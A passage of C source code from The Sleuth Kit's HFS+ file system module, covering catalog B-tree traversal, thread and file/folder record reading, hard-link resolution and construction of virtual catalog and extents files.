                    tsk_error_set_errno(TSK_ERR_FS_GENFS);
                    tsk_error_set_errstr
                        ("hfs_cat_traverse: offset and length of key %d in leaf node %d too large (%d vs %"
                        PRIu16 ")", rec, cur_node, (int) (rec_off + keylen), nodesize);
free(node);
return 1;
}
/*
if (tsk_verbose)
tsk_fprintf(stderr,
"hfs_cat_traverse: record %" PRIu16
"; keylen %" PRIu16 " (%" PRIu32 ")\n", rec,
tsk_getu16(fs->endian, key->key_len),
tsk_getu32(fs->endian, key->parent_cnid));
*/
// rec_cnid = tsk_getu32(fs->endian, key->file_id);
retval =
a_cb(hfs, HFS_BT_NODE_TYPE_LEAF, key,
cur_off + rec_off, ptr);
if (retval == HFS_BTREE_CB_LEAF_STOP) {
is_done = 1;
break;
}
else if (retval == HFS_BTREE_CB_ERR) {
tsk_error_set_errno(TSK_ERR_FS_GENFS);
tsk_error_set_errstr2
("hfs_cat_traverse: Callback returned error");
free(node);
return 1;
}
}
// move right to the next node if we got this far
if (is_done == 0) {
cur_node = tsk_getu32(fs->endian, node_desc->flink);
if (cur_node == 0) {
is_done = 1;
}
if (tsk_verbose)
tsk_fprintf(stderr,
"hfs_cat_traverse: moving forward to next leaf");
}
}
else {
tsk_error_set_errno(TSK_ERR_FS_GENFS);
tsk_error_set_errstr("hfs_cat_traverse: btree node %" PRIu32
" (%" PRIu64 ") is neither index nor leaf (%" PRIu8 ")",
cur_node, cur_off, node_desc->type);
free(node);
return 1;
}
}
free(node);
return 0;
}
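/* Hypothetical sketch (not part of TSK) showing the shape of a
 * hfs_cat_traverse() callback. For index records the callback steers the
 * descent by returning HFS_BTREE_CB_IDX_LT (keep this child as a candidate)
 * or HFS_BTREE_CB_IDX_EQGT (stop scanning this index node); for leaf records
 * it returns HFS_BTREE_CB_LEAF_GO to continue or HFS_BTREE_CB_LEAF_STOP to
 * end the traversal. The parent CNID used below is only an example. */
#if 0
static uint8_t
example_count_children_cb(HFS_INFO * hfs, int8_t level_type,
    const hfs_btree_key_cat * cur_key, TSK_OFF_T key_off, void *ptr)
{
    uint32_t want = 2;          /* example: count records under the root folder */
    uint32_t have = tsk_getu32(hfs->fs_info.endian, cur_key->parent_cnid);

    if (level_type == HFS_BT_NODE_TYPE_IDX) {
        /* descend towards keys with parent_cnid == want */
        return (have < want) ? HFS_BTREE_CB_IDX_LT : HFS_BTREE_CB_IDX_EQGT;
    }
    if (have < want)
        return HFS_BTREE_CB_LEAF_GO;        /* not there yet, keep going */
    if (have > want)
        return HFS_BTREE_CB_LEAF_STOP;      /* past the range of interest */
    (*(uint32_t *) ptr)++;                  /* one more record under 'want' */
    return HFS_BTREE_CB_LEAF_GO;
}
#endif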
typedef struct {
const hfs_btree_key_cat *targ_key;
TSK_OFF_T off;
} HFS_CAT_GET_RECORD_OFFSET_DATA;
static uint8_t
hfs_cat_get_record_offset_cb(HFS_INFO * hfs, int8_t level_type,
const hfs_btree_key_cat * cur_key,
TSK_OFF_T key_off, void *ptr)
{
HFS_CAT_GET_RECORD_OFFSET_DATA *offset_data = (HFS_CAT_GET_RECORD_OFFSET_DATA *)ptr;
const hfs_btree_key_cat *targ_key = offset_data->targ_key;
if (tsk_verbose)
tsk_fprintf(stderr,
"hfs_cat_get_record_offset_cb: %s node want: %" PRIu32
" vs have: %" PRIu32 "\n",
(level_type == HFS_BT_NODE_TYPE_IDX) ? "Index" : "Leaf",
tsk_getu32(hfs->fs_info.endian, targ_key->parent_cnid),
tsk_getu32(hfs->fs_info.endian, cur_key->parent_cnid));
if (level_type == HFS_BT_NODE_TYPE_IDX) {
int diff = hfs_cat_compare_keys(hfs, cur_key, targ_key);
if (diff < 0)
return HFS_BTREE_CB_IDX_LT;
else
return HFS_BTREE_CB_IDX_EQGT;
}
else {
int diff = hfs_cat_compare_keys(hfs, cur_key, targ_key);
// see if this record is for our file or if we passed the interesting entries
if (diff < 0) {
return HFS_BTREE_CB_LEAF_GO;
}
else if (diff == 0) {
offset_data->off =
key_off + 2 + tsk_getu16(hfs->fs_info.endian,
cur_key->key_len);
}
return HFS_BTREE_CB_LEAF_STOP;
}
}
/** \internal
* Find the byte offset (from the start of the catalog file) to a record
* in the catalog file.
* @param hfs File System being analyzed
* @param needle Key to search for
* @returns Byte offset or 0 on error. 0 is also returned if catalog
* record was not found. Check tsk_errno to determine if error occurred.
*/
static TSK_OFF_T
hfs_cat_get_record_offset(HFS_INFO * hfs, const hfs_btree_key_cat * needle)
{
HFS_CAT_GET_RECORD_OFFSET_DATA offset_data;
offset_data.off = 0;
offset_data.targ_key = needle;
if (hfs_cat_traverse(hfs, hfs_cat_get_record_offset_cb, &offset_data)) {
return 0;
}
return offset_data.off;
}
/** \internal
 * Given a byte offset to a leaf record in the catalog file, read the data as
* a thread record. This will zero the buffer and read in the size of the thread
* data.
* @param hfs File System
* @param off Byte offset of record in catalog file (not including key)
* @param thread [out] Buffer to write thread data into.
 * @returns 0 on success and 1 on failure; TSK error values are set on failure */
uint8_t
hfs_cat_read_thread_record(HFS_INFO * hfs, TSK_OFF_T off,
hfs_thread * thread)
{
TSK_FS_INFO *fs = (TSK_FS_INFO *) & (hfs->fs_info);
uint16_t uni_len;
ssize_t cnt;
memset(thread, 0, sizeof(hfs_thread));
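    /* the first 10 bytes are the fixed-length part of the thread record:
     * record type (2), reserved (2), parent CNID (4), and name length (2);
     * the variable-length Unicode name is read separately below */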
cnt = tsk_fs_attr_read(hfs->catalog_attr, off, (char *) thread, 10, 0);
if (cnt != 10) {
if (cnt >= 0) {
tsk_error_reset();
tsk_error_set_errno(TSK_ERR_FS_READ);
}
tsk_error_set_errstr2
("hfs_cat_read_thread_record: Error reading catalog offset %"
PRIuOFF " (header)", off);
return 1;
}
if ((tsk_getu16(fs->endian, thread->rec_type) != HFS_FOLDER_THREAD)
&& (tsk_getu16(fs->endian, thread->rec_type) != HFS_FILE_THREAD)) {
tsk_error_set_errno(TSK_ERR_FS_GENFS);
tsk_error_set_errstr
("hfs_cat_read_thread_record: unexpected record type %" PRIu16,
tsk_getu16(fs->endian, thread->rec_type));
return 1;
}
uni_len = tsk_getu16(fs->endian, thread->name.length);
if (uni_len > 255) {
tsk_error_set_errno(TSK_ERR_FS_INODE_COR);
tsk_error_set_errstr
("hfs_cat_read_thread_record: invalid string length (%" PRIu16
")", uni_len);
return 1;
}
cnt =
tsk_fs_attr_read(hfs->catalog_attr, off + 10,
(char *) thread->name.unicode, uni_len * 2, 0);
if (cnt != uni_len * 2) {
if (cnt >= 0) {
tsk_error_reset();
tsk_error_set_errno(TSK_ERR_FS_READ);
}
tsk_error_set_errstr2
("hfs_cat_read_thread_record: Error reading catalog offset %"
PRIuOFF " (name)", off + 10);
return 1;
}
return 0;
}
/** \internal
* Read a catalog record into a local data structure. This reads the
* correct amount, depending on if it is a file or folder.
* @param hfs File system being analyzed
* @param off Byte offset (in catalog file) of record (not including key)
* @param record [out] Structure to read data into
* @returns 1 on error
*/
uint8_t
hfs_cat_read_file_folder_record(HFS_INFO * hfs, TSK_OFF_T off,
hfs_file_folder * record)
{
TSK_FS_INFO *fs = (TSK_FS_INFO *) & (hfs->fs_info);
ssize_t cnt;
char rec_type[2];
memset(record, 0, sizeof(hfs_file_folder));
cnt = tsk_fs_attr_read(hfs->catalog_attr, off, rec_type, 2, 0);
if (cnt != 2) {
if (cnt >= 0) {
tsk_error_reset();
tsk_error_set_errno(TSK_ERR_FS_READ);
}
tsk_error_set_errstr2
("hfs_cat_read_file_folder_record: Error reading record type from catalog offset %"
PRIuOFF " (header)", off);
return 1;
}
if (tsk_getu16(fs->endian, rec_type) == HFS_FOLDER_RECORD) {
cnt =
tsk_fs_attr_read(hfs->catalog_attr, off, (char *) record,
sizeof(hfs_folder), 0);
if (cnt != sizeof(hfs_folder)) {
if (cnt >= 0) {
tsk_error_reset();
tsk_error_set_errno(TSK_ERR_FS_READ);
}
tsk_error_set_errstr2
("hfs_cat_read_file_folder_record: Error reading catalog offset %"
PRIuOFF " (folder)", off);
return 1;
}
}
else if (tsk_getu16(fs->endian, rec_type) == HFS_FILE_RECORD) {
cnt =
tsk_fs_attr_read(hfs->catalog_attr, off, (char *) record,
sizeof(hfs_file), 0);
if (cnt != sizeof(hfs_file)) {
if (cnt >= 0) {
tsk_error_reset();
tsk_error_set_errno(TSK_ERR_FS_READ);
}
tsk_error_set_errstr2
("hfs_cat_read_file_folder_record: Error reading catalog offset %"
PRIuOFF " (file)", off);
return 1;
}
}
else {
tsk_error_set_errno(TSK_ERR_FS_GENFS);
tsk_error_set_errstr
("hfs_cat_read_file_folder_record: unexpected record type %"
PRIu16, tsk_getu16(fs->endian, rec_type));
return 1;
}
return 0;
}
// hfs_lookup_hard_link appears to be unnecessary - it looks up the cnid
// by seeing if there's a file/dir with the standard hard link name plus
// linknum and returns the meta_addr. But this should always be the same as linknum,
// and is very slow when there are many hard links, so it shouldn't be used.
//static TSK_INUM_T
//hfs_lookup_hard_link(HFS_INFO * hfs, TSK_INUM_T linknum,
// unsigned char is_directory)
//{
// char fBuff[30];
// TSK_FS_DIR *mdir;
// size_t indx;
// TSK_FS_INFO *fs = (TSK_FS_INFO *) hfs;
//
// memset(fBuff, 0, 30);
//
// if (is_directory) {
//
// tsk_take_lock(&(hfs->metadata_dir_cache_lock));
// if (hfs->dir_meta_dir == NULL) {
// hfs->dir_meta_dir =
// tsk_fs_dir_open_meta(fs, hfs->meta_dir_inum);
// }
// tsk_release_lock(&(hfs->metadata_dir_cache_lock));
//
// if (hfs->dir_meta_dir == NULL) {
// error_returned
// ("hfs_lookup_hard_link: could not open the dir metadata directory");
// return 0;
// }
// else {
// mdir = hfs->dir_meta_dir;
// }
// snprintf(fBuff, 30, "dir_%" PRIuINUM, linknum);
//
// }
// else {
//
// tsk_take_lock(&(hfs->metadata_dir_cache_lock));
// if (hfs->meta_dir == NULL) {
// hfs->meta_dir = tsk_fs_dir_open_meta(fs, hfs->meta_inum);
// }
// tsk_release_lock(&(hfs->metadata_dir_cache_lock));
//
// if (hfs->meta_dir == NULL) {
// error_returned
// ("hfs_lookup_hard_link: could not open file metadata directory");
// return 0;
// }
// else {
// mdir = hfs->meta_dir;
// }
// snprintf(fBuff, 30, "iNode%" PRIuINUM, linknum);
// }
//
// for (indx = 0; indx < tsk_fs_dir_getsize(mdir); ++indx) {
// if ((mdir->names != NULL) && mdir->names[indx].name &&
// (fs->name_cmp(fs, mdir->names[indx].name, fBuff) == 0)) {
// // OK this is the one
// return mdir->names[indx].meta_addr;
// }
// }
//
// // OK, we did not find that linknum
// return 0;
//}
/*
* Given a catalog entry, will test that entry to see if it is a hard link.
* If it is a hard link, the function returns the inum (or cnid) of the target file.
 * If it is NOT a hard link, then the function returns the inum of the given entry.
* In both cases, the parameter is_error is set to zero.
*
* If an ERROR occurs, if it is a mild error, then is_error is set to 1, and the
* inum of the given entry is returned. This signals that hard link detection cannot
* be carried out.
*
* If the error is serious, then is_error is set to 2 or 3, depending on the kind of error, and
* the TSK error code is set, and the function returns zero. is_error==2 means that an error
* occurred in looking up the target file in the Catalog. is_error==3 means that the given
* entry appears to be a hard link, but the target file does not exist in the Catalog.
*
* @param hfs The file system
* @param entry The catalog entry to check
 * @param is_error [out] Set to 0 if no error occurred, or to 1, 2, or 3 to indicate the kind of error, as described above.
* @return The inum (or cnid) of the hard link target, or of the given catalog entry, or zero.
*/
TSK_INUM_T
hfs_follow_hard_link(HFS_INFO * hfs, hfs_file * cat,
unsigned char *is_error)
{
TSK_FS_INFO *fs = (TSK_FS_INFO *) hfs;
TSK_INUM_T cnid;
time_t crtime;
uint32_t file_type;
uint32_t file_creator;
*is_error = 0; // default, not an error
if (cat == NULL) {
error_detected(TSK_ERR_FS_ARG,
"hfs_follow_hard_link: Pointer to Catalog entry (2nd arg) is null");
return 0;
}
cnid = tsk_getu32(fs->endian, cat->std.cnid);
if (cnid < HFS_FIRST_USER_CNID) {
// Can't be a hard link. And, cannot look up in Catalog file either!
return cnid;
}
crtime =
(time_t) hfs_convert_2_unix_time(tsk_getu32(fs->endian,
cat->std.crtime));
file_type = tsk_getu32(fs->endian, cat->std.u_info.file_type);
file_creator = tsk_getu32(fs->endian, cat->std.u_info.file_cr);
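    /* HFS+ stores hard links as small "alias" files in hidden metadata
     * folders. The code below recognizes them by the special Finder
     * type/creator pair and, as an extra sanity check, by a creation time
     * that matches one of the file system creation times. The CNID of the
     * link target lives in the field that otherwise holds device numbers
     * (perm.special.inum). */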
// Only proceed with the rest of this if the flags etc are right
if (file_type == HFS_HARDLINK_FILE_TYPE
&& file_creator == HFS_HARDLINK_FILE_CREATOR) {
// see if we have the HFS+ Private Data dir for file links;
// if not, it can't be a hard link. (We could warn the user, but
// we also rely on this when finding the HFS+ Private Data dir in
// the first place and we don't want a warning on every hfs_open.)
if (hfs->meta_inum == 0)
return cnid;
// For this to work, we need the FS creation times. Is at least one of these set?
if ((!hfs->has_root_crtime) && (!hfs->has_meta_dir_crtime)
&& (!hfs->has_meta_crtime)) {
uint32_t linkNum =
tsk_getu32(fs->endian, cat->std.perm.special.inum);
*is_error = 1;
if (tsk_verbose)
tsk_fprintf(stderr,
"WARNING: hfs_follow_hard_link: File system creation times are not set. "
"Cannot test inode for hard link. File type and creator indicate that this"
" is a hard link (file), with LINK ID = %" PRIu32 "\n",
linkNum);
return cnid;
}
if ((!hfs->has_root_crtime) || (!hfs->has_meta_crtime)) {
if (tsk_verbose)
tsk_fprintf(stderr,
"WARNING: hfs_follow_hard_link: Either the root folder or the"
" file metadata folder is not accessible. Testing this potential hard link"
" may be impaired.\n");
}
// Now we need to check the creation time against the three FS creation times
if ((hfs->has_meta_crtime && (crtime == hfs->meta_crtime)) ||
(hfs->has_meta_dir_crtime && (crtime == hfs->metadir_crtime))
|| (hfs->has_root_crtime && (crtime == hfs->root_crtime))) {
// OK, this is a hard link to a file.
uint32_t linkNum =
tsk_getu32(fs->endian, cat->std.perm.special.inum);
// We used to resolve this ID to a file in X folder using hfs_lookup_hard_link, but found
            // that it was very inefficient and always resulted in the same linkNum value.
// We now just use linkNum
return linkNum;
}
}
else if (file_type == HFS_LINKDIR_FILE_TYPE
&& file_creator == HFS_LINKDIR_FILE_CREATOR) {
// see if we have the HFS+ Private Directory Data dir for links;
// if not, it can't be a hard link. (We could warn the user, but
// we also rely on this when finding the HFS+ Private Directory Data dir in
// the first place and we don't want a warning on every hfs_open.)
if (hfs->meta_dir_inum == 0)
return cnid;
// For this to work, we need the FS creation times. Is at least one of these set?
if ((!hfs->has_root_crtime) && (!hfs->has_meta_dir_crtime)
&& (!hfs->has_meta_crtime)) {
uint32_t linkNum =
tsk_getu32(fs->endian, cat->std.perm.special.inum);
*is_error = 1;
if (tsk_verbose)
tsk_fprintf(stderr,
"WARNING: hfs_follow_hard_link: File system creation times are not set. "
"Cannot test inode for hard link. File type and creator indicate that this"
" is a hard link (directory), with LINK ID = %" PRIu32
"\n", linkNum);
return cnid;
}
if ((!hfs->has_root_crtime) || (!hfs->has_meta_crtime)
|| (!hfs->has_meta_dir_crtime)) {
if (tsk_verbose)
                tsk_fprintf(stderr,
                    "WARNING: hfs_follow_hard_link: Either the root folder or the"
                    " file metadata folder or the directory metadata folder is"
" not accessible. Testing this potential hard linked folder "
"may be impaired.\n");
}
// Now we need to check the creation time against the three FS creation times
if ((hfs->has_meta_crtime && (crtime == hfs->meta_crtime)) ||
(hfs->has_meta_dir_crtime && (crtime == hfs->metadir_crtime))
|| (hfs->has_root_crtime && (crtime == hfs->root_crtime))) {
// OK, this is a hard link to a directory.
uint32_t linkNum =
tsk_getu32(fs->endian, cat->std.perm.special.inum);
// We used to resolve this ID to a file in X folder using hfs_lookup_hard_link, but found
            // that it was very inefficient and always resulted in the same linkNum value.
// We now just use linkNum
return linkNum;
}
}
// It cannot be a hard link (file or directory)
return cnid;
}
/** \internal
 * Lookup an entry in the catalog file and save it into the entry data
 * structure. Do not call this for the special files that do not have an
 * entry in the catalog.
* @param hfs File system being analyzed
* @param inum Address (cnid) of file to open
 * @param entry [out] Structure to read data into
 * @param follow_hard_link If non-zero and the entry is a hard link, look up and return the link target's entry instead
* @returns 1 on error or not found, 0 on success. Check tsk_errno
* to differentiate between error and not found. If it is not found, then the
* errno will be TSK_ERR_FS_INODE_NUM. Else, it will be some other value.
*/
uint8_t
hfs_cat_file_lookup(HFS_INFO * hfs, TSK_INUM_T inum, HFS_ENTRY * entry,
unsigned char follow_hard_link)
{
TSK_FS_INFO *fs = (TSK_FS_INFO *) & (hfs->fs_info);
hfs_btree_key_cat key; /* current catalog key */
hfs_thread thread; /* thread record */
hfs_file_folder record; /* file/folder record */
TSK_OFF_T off;
tsk_error_reset();
if (tsk_verbose)
tsk_fprintf(stderr,
"hfs_cat_file_lookup: called for inum %" PRIuINUM "\n", inum);
// Test if this is a special file that is not located in the catalog
if ((inum == HFS_EXTENTS_FILE_ID) ||
(inum == HFS_CATALOG_FILE_ID) ||
(inum == HFS_ALLOCATION_FILE_ID) ||
(inum == HFS_STARTUP_FILE_ID) ||
(inum == HFS_ATTRIBUTES_FILE_ID)) {
tsk_error_set_errno(TSK_ERR_FS_GENFS);
tsk_error_set_errstr
("hfs_cat_file_lookup: Called on special file: %" PRIuINUM,
inum);
return 1;
}
/* first look up the thread record for the item we're searching for */
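    /* (catalog file/folder records are keyed by (parent CNID, name), not by
     * the item's own CNID, so the lookup is a two-step process: the thread
     * record, which is keyed by the item's CNID with an empty name, supplies
     * the parent CNID and name needed to build the key of the real record) */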
/* set up the thread record key */
memset((char *) &key, 0, sizeof(hfs_btree_key_cat));
cnid_to_array((uint32_t) inum, key.parent_cnid);
if (tsk_verbose)
tsk_fprintf(stderr,
"hfs_cat_file_lookup: Looking up thread record (%" PRIuINUM
")\n", inum);
/* look up the thread record */
off = hfs_cat_get_record_offset(hfs, &key);
if (off == 0) {
// no parsing error, just not found
if (tsk_error_get_errno() == 0) {
tsk_error_set_errno(TSK_ERR_FS_INODE_NUM);
tsk_error_set_errstr
("hfs_cat_file_lookup: Error finding thread node for file (%"
PRIuINUM ")", inum);
}
else {
tsk_error_set_errstr2
(" hfs_cat_file_lookup: thread for file (%" PRIuINUM ")",
inum);
}
return 1;
}
/* read the thread record */
if (hfs_cat_read_thread_record(hfs, off, &thread)) {
tsk_error_set_errstr2(" hfs_cat_file_lookup: file (%" PRIuINUM ")",
inum);
return 1;
}
/* now look up the actual file/folder record */
/* build key */
memset((char *) &key, 0, sizeof(hfs_btree_key_cat));
memcpy((char *) key.parent_cnid, (char *) thread.parent_cnid,
sizeof(key.parent_cnid));
memcpy((char *) &key.name, (char *) &thread.name, sizeof(key.name));
if (tsk_verbose)
tsk_fprintf(stderr,
"hfs_cat_file_lookup: Looking up file record (parent: %"
PRIuINUM ")\n", (uint64_t) tsk_getu32(fs->endian,
key.parent_cnid));
/* look up the record */
off = hfs_cat_get_record_offset(hfs, &key);
if (off == 0) {
// no parsing error, just not found
if (tsk_error_get_errno() == 0) {
tsk_error_set_errno(TSK_ERR_FS_INODE_NUM);
tsk_error_set_errstr
("hfs_cat_file_lookup: Error finding record node %"
PRIuINUM, inum);
}
else {
tsk_error_set_errstr2(" hfs_cat_file_lookup: file (%" PRIuINUM
")", inum);
}
return 1;
}
/* read the record */
if (hfs_cat_read_file_folder_record(hfs, off, &record)) {
tsk_error_set_errstr2(" hfs_cat_file_lookup: file (%" PRIuINUM ")",
inum);
return 1;
}
/* these memcpy can be gotten rid of, really */
if (tsk_getu16(fs->endian,
record.file.std.rec_type) == HFS_FOLDER_RECORD) {
if (tsk_verbose)
tsk_fprintf(stderr,
"hfs_cat_file_lookup: found folder record valence %" PRIu32
", cnid %" PRIu32 "\n", tsk_getu32(fs->endian,
record.folder.std.valence), tsk_getu32(fs->endian,
record.folder.std.cnid));
memcpy((char *) &entry->cat, (char *) &record, sizeof(hfs_folder));
}
else if (tsk_getu16(fs->endian,
record.file.std.rec_type) == HFS_FILE_RECORD) {
if (tsk_verbose)
tsk_fprintf(stderr,
"hfs_cat_file_lookup: found file record cnid %" PRIu32
"\n", tsk_getu32(fs->endian, record.file.std.cnid));
memcpy((char *) &entry->cat, (char *) &record, sizeof(hfs_file));
}
/* other cases already caught by hfs_cat_read_file_folder_record */
memcpy((char *) &entry->thread, (char *) &thread, sizeof(hfs_thread));
entry->flags = TSK_FS_META_FLAG_ALLOC | TSK_FS_META_FLAG_USED;
entry->inum = inum;
if (follow_hard_link) {
// TEST to see if this is a hard link
unsigned char is_err;
TSK_INUM_T target_cnid =
hfs_follow_hard_link(hfs, &(entry->cat), &is_err);
if (is_err > 1) {
error_returned
("hfs_cat_file_lookup: error occurred while following a possible hard link for "
"inum (cnid) = %" PRIuINUM, inum);
return 1;
}
if (target_cnid != inum) {
// This is a hard link, and we have got the cnid of the target file, so look it up.
uint8_t res =
hfs_cat_file_lookup(hfs, target_cnid, entry, FALSE);
            if (res != 0) {
                error_returned
                    ("hfs_cat_file_lookup: error occurred while looking up the Catalog entry for "
                    "the target of inum (cnid) = %" PRIuINUM " target",
                    inum);
                return 1;
            }
            // The target's entry was loaded successfully.
            return 0;
}
// Target is NOT a hard link, so fall through to the non-hard link exit.
}
if (tsk_verbose)
tsk_fprintf(stderr, "hfs_cat_file_lookup exiting\n");
return 0;
}
static uint8_t
hfs_find_highest_inum_cb(HFS_INFO * hfs, int8_t level_type,
const hfs_btree_key_cat * cur_key,
TSK_OFF_T key_off, void *ptr)
{
// NOTE: This assumes that the biggest inum is the last one that we
// see. the traverse method does not currently promise that as part of
// its callback "contract".
*((TSK_INUM_T*) ptr) = tsk_getu32(hfs->fs_info.endian, cur_key->parent_cnid);
return HFS_BTREE_CB_IDX_LT;
}
/** \internal
* Returns the largest inode number in file system
* @param hfs File system being analyzed
* @returns largest metadata address
*/
static TSK_INUM_T
hfs_find_highest_inum(HFS_INFO * hfs)
{
// @@@ get actual number from Catalog file (go to far right) (we can't always trust the vol header)
TSK_INUM_T inum;
if (hfs_cat_traverse(hfs, hfs_find_highest_inum_cb, &inum)) {
/* Catalog traversal failed, fallback on legacy method :
if HFS_VH_ATTR_CNIDS_REUSED is set, then
the maximum CNID is 2^32-1; if it's not set, then nextCatalogId is
supposed to be larger than all CNIDs on disk.
*/
TSK_FS_INFO *fs = (TSK_FS_INFO *) & (hfs->fs_info);
if (tsk_getu32(fs->endian, hfs->fs->attr) & HFS_VH_ATTR_CNIDS_REUSED)
return (TSK_INUM_T) 0xffffffff;
else
return (TSK_INUM_T) tsk_getu32(fs->endian,
hfs->fs->next_cat_id) - 1;
}
return inum;
}
static TSK_FS_META_MODE_ENUM
hfs_mode_to_tsk_mode(uint16_t a_mode)
{
TSK_FS_META_MODE_ENUM mode = 0;
if (a_mode & HFS_IN_ISUID)
mode |= TSK_FS_META_MODE_ISUID;
if (a_mode & HFS_IN_ISGID)
mode |= TSK_FS_META_MODE_ISGID;
if (a_mode & HFS_IN_ISVTX)
mode |= TSK_FS_META_MODE_ISVTX;
if (a_mode & HFS_IN_IRUSR)
mode |= TSK_FS_META_MODE_IRUSR;
if (a_mode & HFS_IN_IWUSR)
mode |= TSK_FS_META_MODE_IWUSR;
if (a_mode & HFS_IN_IXUSR)
mode |= TSK_FS_META_MODE_IXUSR;
if (a_mode & HFS_IN_IRGRP)
mode |= TSK_FS_META_MODE_IRGRP;
if (a_mode & HFS_IN_IWGRP)
mode |= TSK_FS_META_MODE_IWGRP;
if (a_mode & HFS_IN_IXGRP)
mode |= TSK_FS_META_MODE_IXGRP;
if (a_mode & HFS_IN_IROTH)
mode |= TSK_FS_META_MODE_IROTH;
if (a_mode & HFS_IN_IWOTH)
mode |= TSK_FS_META_MODE_IWOTH;
if (a_mode & HFS_IN_IXOTH)
mode |= TSK_FS_META_MODE_IXOTH;
return mode;
}
static TSK_FS_META_TYPE_ENUM
hfs_mode_to_tsk_meta_type(uint16_t a_mode)
{
switch (a_mode & HFS_IN_IFMT) {
case HFS_IN_IFIFO:
return TSK_FS_META_TYPE_FIFO;
case HFS_IN_IFCHR:
return TSK_FS_META_TYPE_CHR;
case HFS_IN_IFDIR:
return TSK_FS_META_TYPE_DIR;
case HFS_IN_IFBLK:
return TSK_FS_META_TYPE_BLK;
case HFS_IN_IFREG:
return TSK_FS_META_TYPE_REG;
case HFS_IN_IFLNK:
return TSK_FS_META_TYPE_LNK;
case HFS_IN_IFSOCK:
return TSK_FS_META_TYPE_SOCK;
case HFS_IFWHT:
return TSK_FS_META_TYPE_WHT;
case HFS_IFXATTR:
return TSK_FS_META_TYPE_UNDEF;
default:
/* error */
return TSK_FS_META_TYPE_UNDEF;
}
}
static uint8_t
hfs_make_specialbase(TSK_FS_FILE * fs_file)
{
fs_file->meta->type = TSK_FS_META_TYPE_REG;
fs_file->meta->mode = 0;
fs_file->meta->nlink = 1;
fs_file->meta->flags =
(TSK_FS_META_FLAG_USED | TSK_FS_META_FLAG_ALLOC);
fs_file->meta->uid = fs_file->meta->gid = 0;
fs_file->meta->mtime = fs_file->meta->atime = fs_file->meta->ctime =
fs_file->meta->crtime = 0;
fs_file->meta->mtime_nano = fs_file->meta->atime_nano =
fs_file->meta->ctime_nano = fs_file->meta->crtime_nano = 0;
if (fs_file->meta->name2 == NULL) {
if ((fs_file->meta->name2 = (TSK_FS_META_NAME_LIST *)
tsk_malloc(sizeof(TSK_FS_META_NAME_LIST))) == NULL) {
error_returned
(" - hfs_make_specialbase, couldn't malloc space for a name list");
return 1;
}
fs_file->meta->name2->next = NULL;
}
if (fs_file->meta->attr != NULL) {
tsk_fs_attrlist_markunused(fs_file->meta->attr);
}
else {
fs_file->meta->attr = tsk_fs_attrlist_alloc();
}
return 0;
}
/**
* \internal
* Create an FS_INODE structure for the catalog file.
*
* @param hfs File system to analyze
* @param fs_file Structure to copy file information into.
* @return 1 on error and 0 on success
*/
static uint8_t
hfs_make_catalog(HFS_INFO * hfs, TSK_FS_FILE * fs_file)
{
TSK_FS_INFO *fs = (TSK_FS_INFO *) hfs;
TSK_FS_ATTR *fs_attr;
TSK_FS_ATTR_RUN *attr_run;
unsigned char dummy1, dummy2;
uint64_t dummy3;
uint8_t result;
if (tsk_verbose)
tsk_fprintf(stderr,
"hfs_make_catalog: Making virtual catalog file\n");
if (hfs_make_specialbase(fs_file)) {
error_returned(" - hfs_make_catalog");
return 1;
}
fs_file->meta->addr = HFS_CATALOG_FILE_ID;
strncpy(fs_file->meta->name2->name, HFS_CATALOGNAME,
TSK_FS_META_NAME_LIST_NSIZE);
fs_file->meta->size =
tsk_getu64(fs->endian, hfs->fs->cat_file.logic_sz);
// convert the runs in the volume header to attribute runs
if (((attr_run =
hfs_extents_to_attr(fs, hfs->fs->cat_file.extents,
0)) == NULL) && (tsk_error_get_errno() != 0)) {
error_returned(" - hfs_make_catalog");
return 1;
}
if ((fs_attr =
tsk_fs_attrlist_getnew(fs_file->meta->attr,
TSK_FS_ATTR_NONRES)) == NULL) {
error_returned(" - hfs_make_catalog");
tsk_fs_attr_run_free(attr_run);
return 1;
}
// initialize the data run
if (tsk_fs_attr_set_run(fs_file, fs_attr, attr_run, NULL,
TSK_FS_ATTR_TYPE_DEFAULT, HFS_FS_ATTR_ID_DATA,
tsk_getu64(fs->endian, hfs->fs->cat_file.logic_sz),
tsk_getu64(fs->endian, hfs->fs->cat_file.logic_sz),
tsk_getu64(fs->endian, hfs->fs->cat_file.logic_sz), 0, 0)) {
error_returned(" - hfs_make_catalog");
tsk_fs_attr_run_free(attr_run);
return 1;
}
// see if catalog file has additional runs
if (hfs_ext_find_extent_record_attr(hfs, HFS_CATALOG_FILE_ID, fs_attr,
TRUE)) {
error_returned(" - hfs_make_catalog");
fs_file->meta->attr_state = TSK_FS_META_ATTR_ERROR;
return 1;
}
result = hfs_load_extended_attrs(fs_file, &dummy1, &dummy2, &dummy3);
if (result != 0) {
if (tsk_verbose)
tsk_fprintf(stderr,
"WARNING: Extended attributes failed to load for the Catalog file.\n");
tsk_error_reset();
}
fs_file->meta->attr_state = TSK_FS_META_ATTR_STUDIED;
return 0;
}
/**
* \internal
* Create an FS_FILE for the extents file
*
* @param hfs File system to analyze
* @param fs_file Structure to copy file information into.
* @return 1 on error and 0 on success
*/
static uint8_t
hfs_make_extents(HFS_INFO * hfs, TSK_FS_FILE * fs_file)
{
TSK_FS_INFO *fs = (TSK_FS_INFO *) hfs;
TSK_FS_ATTR *fs_attr;
TSK_FS_ATTR_RUN *attr_run;
if (tsk_verbose)
tsk_fprintf(stderr,
"hfs_make_extents: Making virtual extents file\n");
if (hfs_make_specialbase(fs_file)) {
error_returned(" - hfs_make_extents");
return 1;
}
fs_file->meta->addr = HFS_EXTENTS_FILE_ID;
strncpy(fs_file->meta->name2->name, HFS_EXTENTSNAME,
TSK_FS_META_NAME_LIST_NSIZE);
fs_file->meta->size =
tsk_getu64(fs->endian, hfs->fs->ext_file.logic_sz);
if (((attr_run =
hfs_extents_to_attr(fs, hfs->fs->ext_file.extents,
0)) == NULL) && (tsk_error_get_errno() != 0)) {
error_returned(" - hfs_make_extents");
return 1;
}
if ((fs_attr =
tsk_fs_attrlist_getnew(fs_file->meta->attr,
TSK_FS_ATTR_NONRES)) == NULL) {
error_returned(" - hfs_make_extents");
tsk_fs_attr_run_free(attr_run);
return 1;
}
// initialize the data run
if (tsk_fs_attr_set_run(fs_file, fs_attr, attr_run, NULL,
TSK_FS_ATTR_TYPE_DEFAULT, HFS_FS_ATTR_ID_DATA,
tsk_getu64(fs->endian, hfs->fs->ext_file.logic_sz),
tsk_getu64(fs->endian, hfs->fs->ext_file.logic_sz),
tsk_getu64(fs->endian, hfs->fs->ext_file.logic_sz), 0, 0)) {
error_returned(" - hfs_make_extents");
tsk_fs_attr_run_free(attr_run);
return 1;
}
